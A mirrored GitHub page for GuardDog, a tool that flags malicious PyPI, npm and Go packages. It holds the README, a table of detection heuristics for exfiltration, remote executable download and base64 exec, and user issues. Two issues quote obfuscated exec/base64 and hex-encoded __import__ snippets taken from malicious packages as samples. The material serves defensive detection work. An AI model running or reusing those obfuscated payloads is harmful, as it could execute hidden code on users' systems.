Git Product home page Git Product logo

datadog / guarddog Goto Github PK

View Code? Open in Web Editor NEW
542.0 19.0 42.0 10.23 MB

:snake: :mag: GuardDog is a CLI tool to Identify malicious PyPI and npm packages

Home Page: https://securitylabs.datadoghq.com/articles/guarddog-identify-malicious-pypi-packages/

License: Apache License 2.0

Python 79.40% Makefile 0.42% Dockerfile 0.53% Jupyter Notebook 13.28% JavaScript 5.38% Shell 0.99%
malicious-packages pypi-packages python python-security software-supply-chain-security npm npm-packages

guarddog's Introduction

GuardDog

Test Static analysis

GuardDog

GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages or Go modules. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata.

GuardDog can be used to scan local or remote PyPI and npm packages or Go modules using any of the available heuristics.

GuardDog demo usage

Getting started

Installation

pip install guarddog

Or use the Docker image:

docker pull ghcr.io/datadog/guarddog
alias guarddog='docker run --rm ghcr.io/datadog/guarddog'

Note: On Windows, the only supported installation method is Docker.

Sample usage

# Scan the most recent version of the 'requests' package
guarddog pypi scan requests

# Scan a specific version of the 'requests' package
guarddog pypi scan requests --version 2.28.1

# Scan the 'request' package using 2 specific heuristics
guarddog pypi scan requests --rules exec-base64 --rules code-execution

# Scan the 'requests' package using all rules but one
guarddog pypi scan requests --exclude-rules exec-base64

# Scan a local package archive
guarddog pypi scan /tmp/triage.tar.gz

# Scan a local package directory
guarddog pypi scan /tmp/triage/

# Scan every package referenced in a requirements.txt file of a local folder
guarddog pypi verify workspace/guarddog/requirements.txt

# Scan every package referenced in a requirements.txt file and output a sarif file - works only for verify
guarddog pypi verify --output-format=sarif workspace/guarddog/requirements.txt

# Output JSON to standard output - works for every command
guarddog pypi scan requests --output-format=json

# All the commands also work on npm or go
guarddog npm scan express

# Run in debug mode
guarddog --log-level debug npm scan express

Heuristics

GuardDog comes with 2 types of heuristics:

PyPI

Source code heuristics:

Heuristic Description
shady-links Identify when a package contains an URL to a domain with a suspicious extension
obfuscation Identify when a package uses a common obfuscation method often used by malware
clipboard-access Identify when a package reads or write data from the clipboard
exfiltrate-sensitive-data Identify when a package reads and exfiltrates sensitive data from the local system
download-executable Identify when a package downloads and makes executable a remote binary
exec-base64 Identify when a package dynamically executes base64-encoded code
silent-process-execution Identify when a package silently executes an executable
dll-hijacking Identifies when a malicious package manipulates a trusted application into loading a malicious DLL
bidirectional-characters Identify when a package contains bidirectional characters, which can be used to display source code differently than its actual execution. See more at https://trojansource.codes/
steganography Identify when a package retrieves hidden data from an image and executes it
code-execution Identify when an OS command is executed in the setup.py file
cmd-overwrite Identify when the 'install' command is overwritten in setup.py, indicating a piece of code automatically running when the package is installed

Metadata heuristics:

Heuristic Description
empty_information Identify packages with an empty description field
release_zero Identify packages with an release version that's 0.0 or 0.0.0
typosquatting Identify packages that are named closely to an highly popular package
potentially_compromised_email_domain Identify when a package maintainer e-mail domain (and therefore package manager account) might have been compromised
unclaimed_maintainer_email_domain Identify when a package maintainer e-mail domain (and therefore npm account) is unclaimed and can be registered by an attacker
repository_integrity_mismatch Identify packages with a linked GitHub repository where the package has extra unexpected files
single_python_file Identify packages that have only a single Python file
bundled_binary Identify packages bundling binaries
deceptive_author This heuristic detects when an author is using a disposable email

npm

Source code heuristics:

Heuristic Description
npm-serialize-environment Identify when a package serializes 'process.env' to exfiltrate environment variables
npm-obfuscation Identify when a package uses a common obfuscation method often used by malware
npm-silent-process-execution Identify when a package silently executes an executable
shady-links Identify when a package contains an URL to a domain with a suspicious extension
npm-exec-base64 Identify when a package dynamically executes code through 'eval'
npm-install-script Identify when a package has a pre or post-install script automatically running commands
npm-steganography Identify when a package retrieves hidden data from an image and executes it
bidirectional-characters Identify when a package contains bidirectional characters, which can be used to display source code differently than its actual execution. See more at https://trojansource.codes/
npm-dll-hijacking Identifies when a malicious package manipulates a trusted application into loading a malicious DLL
npm-exfiltrate-sensitive-data Identify when a package reads and exfiltrates sensitive data from the local system

Metadata heuristics:

Heuristic Description
empty_information Identify packages with an empty description field
release_zero Identify packages with an release version that's 0.0 or 0.0.0
potentially_compromised_email_domain Identify when a package maintainer e-mail domain (and therefore package manager account) might have been compromised; note that NPM's API may not provide accurate information regarding the maintainer's email, so this detector may cause false positives for NPM packages. see https://www.theregister.com/2022/05/10/security_npm_email/
unclaimed_maintainer_email_domain Identify when a package maintainer e-mail domain (and therefore npm account) is unclaimed and can be registered by an attacker; note that NPM's API may not provide accurate information regarding the maintainer's email, so this detector may cause false positives for NPM packages. see https://www.theregister.com/2022/05/10/security_npm_email/
typosquatting Identify packages that are named closely to an highly popular package
direct_url_dependency Identify packages with direct URL dependencies. Dependencies fetched this way are not immutable and can be used to inject untrusted code or reduce the likelihood of a reproducible install.
npm_metadata_mismatch Identify packages which have mismatches between the npm package manifest and the package info for some critical fields
bundled_binary Identify packages bundling binaries
deceptive_author This heuristic detects when an author is using a disposable email

go

Source code heuristics:

Heuristic Description
shady-links Identify when a package contains an URL to a domain with a suspicious extension

Custom Rules

Guarddog allows to implement custom sourcecode rules. Sourcecode rules live under the guarddog/analyzer/sourcecode directory, and supported formats are Semgrep or Yara.

  • Semgrep rules are language-dependent, and Guarddog will import all .yml rules where the language matches the ecosystem selected by the user in CLI.
  • Yara rules on the other hand are language agnostic, therefore all matching .yar rules present will be imported.

Is possible then to write your own rule and drop it into that directory, Guarddog will allow you to select it or exclude it as any built-in rule as well as appending the findings to its output.

For example, you can create the following semgrep rule:

rules:
  - id: sample-rule 
    languages:
      - python
    message: Output message when rule matches
    metadata:
      description: Description used in the CLI help
    patterns:
        YOUR RULE HEURISTICS GO HERE  
    severity: WARNING

Then you'll need to save it as sample-rule.yml and note that the id must match the filename

In the case of Yara, you can create the following rule:

rule sample-rule
{
  meta:
    description = "Description used in the output message"
    target_entity = "file"
  strings:
    $exec = "exec"
  condition:
    1 of them
}

Then you'll need to save it as sample-rule.yar.

Note that in both cases, the rule id must match the filename

Running GuardDog in a GitHub Action

The easiest way to integrate GuardDog in your CI pipeline is to leverage the SARIF output format, and upload it to GitHub's code scanning feature.

Using this, you get:

  • Automated comments to your pull requests based on the GuardDog scan output
  • Built-in false positive management directly in the GitHub UI

Sample GitHub Action using GuardDog:

name: GuardDog

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

permissions:
  contents: read

jobs:
  guarddog:
    permissions:
      contents: read # for actions/checkout to fetch code
      security-events: write # for github/codeql-action/upload-sarif to upload SARIF results
    name: Scan dependencies
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v5
        with:
          python-version: "3.10"

      - name: Install GuardDog
        run: pip install guarddog

      - run: guarddog pypi verify requirements.txt --output-format sarif --exclude-rules repository_integrity_mismatch > guarddog.sarif

      - name: Upload SARIF file to GitHub
        uses: github/codeql-action/upload-sarif@v3
        with:
          category: guarddog-builtin
          sarif_file: guarddog.sarif

Development

Running a local version of GuardDog

Using pip

  • Ensure >=python3.10 is installed
  • Clone the repository
  • Create a virtualenv: python3 -m venv venv && source venv/bin/activate
  • Install requirements: pip install -r requirements.txt
  • Run GuardDog using python -m guarddog

Using poetry

  • Ensure poetry has an env with python >=3.10 poetry env use 3.10.0
  • Install dependencies poetry install
  • Run guarddog poetry run guarddog or poetry shell then run guarddog

Unit tests

Running all unit tests: make test

Running unit tests against Semgrep rules: make test-semgrep-rules (tests are here). These use the standard methodology for testing Semgrep rules.

Running unit tests against package metadata heuristics: make test-metadata-rules (tests are here).

Benchmarking

You can run GuardDog on legitimate and malicious packages to determine false positives and false negatives. See ./tests/samples

Code quality checks

Run the type checker with

mypy --install-types --non-interactive guarddog

and the linter with

flake8 guarddog --count --select=E9,F63,F7,F82 --show-source --statistics --exclude tests/analyzer/sourcecode,tests/analyzer/metadata/resources,evaluator/data
flake8 guarddog --count --max-line-length=120 --statistics --exclude tests/analyzer/sourcecode,tests/analyzer/metadata/resources,evaluator/data --ignore=E203,W503

Maintainers

Authors:

Acknowledgments

Inspiration:

guarddog's People

Contributors

angellusmortis avatar cedricvanrompay-datadog avatar christophetd avatar claire-thib avatar d-niu avatar dependabot[bot] avatar enelli avatar h4dr1en avatar ikretz avatar jamessteel123 avatar juliendoutre avatar jxdv avatar materro avatar quinceyjames avatar romain-dd avatar sobregosodd avatar taiki-san avatar torxed avatar vdeturckheim avatar xopham avatar yzhan289 avatar zmallen avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

guarddog's Issues

Upload to PyPi

It would be nice if the package was uploaded to PyPi so it does not need to be installed directly from Github.

  • guarddog @ git+https://github.com/DataDog/[email protected] is a much longer dep then just guarddog
  • Installing directly from github means a PyPi mirror cannot be used, meaning builds can be slowed down
  • Another malicious package may get uploaded to PyPi that pretends to be this one

list index out of range

On latest semgrep-rules branch:

$ python -m pysecurity -n ttyyyyyy -v 8.8.8
list index out of range

False positive to identify non-existing maintainer e-mails

Sample:

$ guarddog scan platformdirs
{'errors': {'compromised_email': 'Domain ronnypfannschmidt.de does not exist'},

$ whois  ronnypfannschmidt.de

refer:        whois.denic.de

domain:       DE

organisation: DENIC eG
address:      Kaiserstrasse 75-77
address:      Frankfurt am Main  60329
address:      Germany

status:       ACTIVE
remarks:      Registration information: http://www.denic.de/

created:      1986-11-05
changed:      2021-06-01
source:       IANA

False positive: Typosquatting

Hi there, first off all: awesome tools you guys made! 🎉
Second, I encountered the following output when scanning a requirements.txt file:

Found 2 potentially malicious indicators in ruamel-yaml version 0.17.21

typosquatting: This package closely ressembles the following package names, and might be a typosquatting attempt: ruamel-yaml, ruamel-yaml

code-execution: found 1 source code matches
  * setup.py file executing code at ruamel.yaml-0.17.21/setup.py:955
        subprocess.check_output(cmd)

I do get why the second indicator is found, but the first one confuses me:

The package name (also installed on my machine) is ruamel.yaml. There is no package named ruamel-yaml in either my requirements nor on PyPi. Did something went from with the dots in the package name? Or is it because this package is listed in your typosquatting list as ruamel-yaml?

Thanks!

Potentially incorrect find with cmd-override

I'm a bit confused why guarddog reports pip command override in this case where the reads are clearly happening in the long_description.
Package: pytest-cov version 4.0.0
Link to code: https://github.com/pytest-dev/pytest-cov/blob/master/setup.py#L88)

cmd-overwrite: found 1 source code matches
  * Standard pip command overwritten in setup.py at pytest-cov-4.0.0/setup.py:88
        setup(
        name='pytest-cov',
        version='4.0.0',
        license='MIT',
        description='Pytest plugin for measuring coverage.',
        long_description='{}\n{}'.format(read('README.rst'), re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.r...,
        },
    )

Heuristic: False negative on base64 decode

import base64;exec(''.join([y[0] for x in [x for x in base64.b64decode( ('TSUmPCwrKCEvLCQnLypNJ3AnL3IvLCQnLypEJC').encode('ascii') ).decode('ascii')] for y in [[x[0], x[1]] for x in {'\t': 'e', '\n': 'M', ' ': '!', '!': 'u', '@': ':', '~': ')', '`': '#', '#': '9', '$': 'J', '%': '`', '^': 'x', '&': 'b', '*': '2', '(': 'r', ')': ' ', '_': '[', '=': '.', '-': 'R', '+': 'K', '{': 'n', '}': '-', '|': 'm', '\\': 'C', '[': 'Z', ']': 'j', ':': '3', ';': 'z', '"': '~', "'": 'c', ',': 'g', '.': 'D', '/': 'L', '?': '1', '>': '7', '<': '|', '0': 'q', '1': 'G', '2': 'd', '3': 'X', '4': '"', '5': '\t', '6': 'N', '7': '_', '8': '6', '9': 'i', 'a': 'O', 'b': '^', 'c': '/', 'd': '$', 'e': "'", 'f': '0', 'g': 'V', 'h': 'T', 'i': '%', 'j': 'H', 'k': '=', 'l': 'l', 'm': '&', 'n': '?', 'o': ',', 'p': '<', 'q': 'a', 'u': 'F', 'r': '+', 's': '*', 't': '(', 'v': '@', 'w': 'o', 'x': 'p', 'y': 'A', 'z': '4', 'A': 'v', 'B': 'I', 'C': 'f', 'D': 'P', 'E': 'k', 'F': 's', 'G': '5', 'H': '8', 'I': 'U', 'J': ']', 'K': 'h', 'L': 'W', 'M': 'B', 'N': '>', 'O': 'E', 'P': '\\', 'Q': 'y', 'U': 'S', 'R': 't', 'S': '}', 'T': '{', 'V': 'Y', 'W': '\n', 'X': ';', 'Y': 'w', 'Z': 'Q'}.items()] if x == y[1]]))

Alert silencing features

Ignore specific false positives! General users often get alert fatigue. To avoid this and make the tool more user friendly, alert silencing should be implemented. However, don’t bake it into the command. This means don’t add more flags into a command, making it super long. Instead, find ways to bake it into the code being scanned This means:

  • Allowing specific lines to be ignored in requirements.txt through semantic comments, like Semgrep
  • Allowing users to create a configuration file on their local machine that specifies a list of files that escape scanning (local scan mode)
  • For potential pip install command (i.e. pysecurity pip install ), devise a way to override the flags given by the command. For example, if cryptography is detected by pysecurity pip install, but we want to override the malicious flag, allow a way for the user to indicate, “I have reviewed cryptography, so please don’t error out or warn me”

Alias "pip install" to "guarddog"

Just a random idea I had:

As a: developer
I want to: automatically run pysecurity on every package I install
and that: the installation fails if the package is dangerous
so that: I don't install malicious packages

The idea would be to document a way to have an alias that runs pysecurity, then pip install, and fails if the package is deemed "risky".

Sample usage:

$ securepip install mypackage
Scanning mypackage with pysecurity...
No malicious behavior found, proceeding with pip install

Implementation: the easiest would be to provide a bash function one could add to their .bashrc

Heuristic to catch exec of base64 decoded strings

As discussed, we should probably have a heuristics that matches on:

exec(base64.b64decode("..."))

any more generally anything that looks like:

exec(anyfunction(anyotherfunction(base64.b64decode("..."))))

Sample package: botcity-documents

Heuristic: Identify when globals() or __import__ are used with constant hex strings

Sample:

from builtins import *;OOO0O0OOOOO000oOo0oOoOo0,llIIlIlllllIlIlIlll,Oo000O0OO0oO0oO00oO0oO0O,WXWXXWWXXWXWXWWXXXWXXWX,XWWWWXXXXWWWWWXXWWX=(lambda SS2S222S22SS22S22S:SS2S222S22SS22S22S(__import__('\x7a\x6c\x69\x62'))),(lambda SS2S222S22SS22S22S:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']

Typosquatting false positive if pacakge has peroid

If the package name has a period in the name, it generates a typosquatting error all the time.

Example using keyrings.google-artifactregistry-auth (Google made package for using Google Artifact Registry):

guarddog scan keyrings.google-artifactregistry-auth

[Issue/Question] Support against a requirements.txt file that contains specific version pins

Hi!

We are currently using pip-tools, which automatically pins every dependency against the version we specify in our requirements.in file. As such, whenever we run guarddog verify requirements.txt, it will result in a 404.

Is there any way to support this? I could write a script does a bit of regex but would like some support from the maintainers if possible.

To reproduce.

  1. install pip-tools
  2. create a requirements.in, and add requests, guarddog, etc...
  3. run pip-compile
# requirements.txt
...
requests==2.28.1
    # via
    #   via -r requirements.in
...
  1. run guarddog verify requirements.txt
  2. Result in Received status code: 404 from PyPI

false negative when using os.popen

e.g. x-mroy-1052 is doing:


os.popen("cd %s && git init " % TEST_MODULES_ROOT)
        os.popen("cd %s && git remote add origin https://github.com/Qingluan/x-plugins.git"  % TEST_MODULES_ROOT)

        os.popen("chmod +x %s && cp %s /usr/local/bin/x-neid-server " % ("startup.bash", "startup.bash"))
        os.popen("cp %s %s" % ("supervisord.conf", SHOME))
        os.popen("cp %s %s" % ("server.crt", SHOME))
        os.popen("cp %s %s" % ("server.key", SHOME))
        os.popen("cp %s %s" % ("swordnode.ini", DB_PATH_C))

        os.popen("cp %s %s" % ("x-neid.conf", J(SHOME_SERVICES, "x-neid.conf")))
        os.popen("cp %s %s" % ("x-auth.conf", J(SHOME_SERVICES, "x-auth.conf")))
        os.popen("cp %s %s" % ("x-node-test.conf", J(SHOME_SERVICES, "x-node-test.conf")))

but it's not being caught by the current rule

False positives: exclude common commands from setu.py execution rule

Examples found in the wild:

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"LabelLib-2020.10.5/setup.py:21": "            out = check_output(['cmake', '--version'])"}, "cmd-overwrite": {}, "typosquatting": []}

(I've seen the cmake case several times)

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"redditanalysis-1.0.5/setup.py:16": "        os.system(\"pandoc --from=markdown --to=rst --output=README.rst README.md\")"}, "cmd-overwrite": {}, "typosquatting": []}

(pandoc as well)

Add missing methods to execute code

We have 2 rules where we match for code execution:

  • exec-base64.yml
  • code-execution.yml

These two rules should detect the same functions to detect code execution. Currently, code-execution only flags exec and subprocess.X

false positive when detecting domain extensions

Sample match (package kg-qa)

"Detected an unsafe link to url = 'https://lov.linkeddata.es/dataset/lov/api/v2/vocabulary/autocomplete?q=%s'%vocab.

It should not have matched since the domain extension is .es (and not .link, although it probably matches because of the lov.link... portion

False positive: running pkg-config

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"pdfparser-rossum-1.5.3/setup.py:80": "            items = subprocess.check_output(['pkg-config', optional_args, pkg_option, package]).decode('utf8').split()"}, "cmd-overwrite": {}, "typosquatting": []}

Use Semgrep join and extract mode to make rules more robust

Join and Extract Mode Documentation

https://semgrep.dev/docs/experiments/join-mode/recursive-joins/
https://semgrep.dev/docs/experiments/extract-mode/

Ideas for Improvements

Join mode could allow us to create a collection of similar commands to reuse in all our rules, kind of like how CodeQL has an all encompassing user-input command. Extract mode could help us detect bash commands hidden in exec/eval/os.system/etc. commands instead of broadly detecting the calling function.

Note: For now, join mode doesn't seem to work with taint tracking: semgrep/semgrep#5062

Scanning a local package doesn't seem to work

guarddog scan Documents/pypi-malicious/20202-11-03-xolokvhcqvifyf-0.0.0.tar.gz  ✔  9.95G   3.05 
{'errors': {},
'issues': 0,
'results': {'cmd-overwrite': {},
'code-execution': {},
'download-executable': {},
'exec-base64': {},
'exfiltrate-sensitive-data': {},
'shady-links': {}}}

suggestion: don't match on "suspicious links" in comments?

e.g.

Scanning pip
{'secrets': {}, 'shady-links': {'/var/folders/_j/rxmxz87j51q5mzmk79qs0qs00000gp/T/tmp0lq4d1hz/pip-22.1.2/pip-22.1.2/src/pip/_internal/network/session.py': ['Detected an unsafe link to SECURE_ORIGINS: List[SecureOrigin] = [\n    # protocol, hostname, port\n    # Taken from Chrome\'s list of secure origins (See: http://bit.ly/1qrySKC)\n    ("https", "*", "*"),\n    ("*", "localhost", "*"),\n    ("*", "127.0.0.0/8", "*"),\n    ("*", "::1/128", "*"),\n    ("file", "*", None),\n    # ssh is always secure.\n    ("ssh", "*", "*"),\n].', 'Detected an unsafe link to [\n    # protocol, hostname, port\n    # Taken from Chrome\'s list of secure origins (See: http://bit.ly/1qrySKC)\n    ("https", "*", "*"),\n    ("*", "localhost", "*"),\n    ("*", "127.0.0.0/8", "*"),\n    ("*", "::1/128", "*"),\n    ("file", "*", None),\n    # ssh is always secure.\n    ("ssh", "*", "*"),\n].'], '/var/folders/_j/rxmxz87j51q5mzmk79qs0qs00000gp/T/tmp0lq4d1hz/pip-22.1.2/pip-22.1.2/src/pip/_vendor/tenacity/wait.py': ['Detected an unsafe link to """Random wait with exponentially widening window.\n\n    An exponential backoff strategy used to mediate contention between multiple\n    uncoordinated processes for a shared resource in distributed systems. This\n    is the sense in which "exponential backoff" is meant in e.g. Ethernet\n    networking, and corresponds to the "Full Jitter" algorithm described in\n    this blog post:\n\n    https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/\n\n    Each retry occurs at a random time in a geometrically expanding interval.\n    It allows for a custom multiplier and an ability to restrict the upper\n    limit of the random interval to some maximum value.\n\n    Example::\n\n        wait_random_exponential(multiplier=0.5,  # initial window 0.5s\n                                max=60)          # max 60s timeout\n\n    When waiting for an unavailable resource to become available again, as\n    opposed to trying to resolve contention for a shared resource, the\n    wait_exponential strategy (which uses a fixed interval) may be preferable.\n\n    """.']}, 'post-systeminfo': {}, 'download-executable': {}, 'base64-strings': {}, 'code-execution': {}, 'cmd-overwrite': {}, 'typosquatting': None}

Test metadata rules, analyzer, and CLI

Source code tests already exist in tests/analyzer/sourcecode. Tests for the metadata rules should exist in tests/analyzer/metadata. Tests should also exist for the analyzer, CLI tool, etc. (mirroring directory structure)

  • Metadata tests
  • Analyzer tests

Install issue when poetry is not installed

$ pip3 install git+https://github.com/DataDog/guarddog.git
...
ModuleNotFoundError: No module named 'poetry'

We may need to update the install docs? Also, it would be good that we don't require installing poetry to be able to use guarddog. But if we need, so be it

False positive

Scanning py-riff
{"secrets": {}, "shady-links": {}, "post-systeminfo": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"py-riff-1.7/setup.py": ["    version= subprocess.check_output(['git', 'describe', '--tags']).strip() \\"]}, "cmd-overwrite": {}, "typosquatting": null}

Add a mode to scan a `requirements.txt` file

As a: developer
I need too: be able to run pysecurity on my project's dependency
So that: I can be alerted if one of my dependencies is malicious

Sample usage (suggestion):

python3 -m pysecurity -n /my/project/requirements.txt # Keep the same argument as a local package, and detect if it's a text file

# or
python3 -m pysecurity --requirements /my/project/requirements.txt

Guarddog hanging when it receices 404 from PyPi

We have a bunch of internal libraries that are not uploaded to pypi (and never will be) but rather included in a form

${package} @ file:///tmp/${package}-${version}.tar.gz

whenever guarddog finds such a package it tries to load it form pypi and then the whole process hangs and doesn't complete execution.

False positive: running python unittests

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"pyadt-1.0.0/setup.py:52": "        errno = call([\"python\", \"-m\", \"unittest\", \"discover\"])"}, "cmd-overwrite": {}, "typosquatting": []

in pyadt

False positive for gpg and pip

I've seen that one a few times, maybe we can whitelist "pip freeze" and gpg?

Scanning oedtools
{"secrets": {}, "shady-links": {}, "post-systeminfo": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"oedtools-1.0.2/setup.py": ["        if os.system('pip freeze | grep twine'):", "                os.system('gpg --detach-sign -a {}'.format(p))"]}, "cmd-overwrite": {}, "typosquatting": null}

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.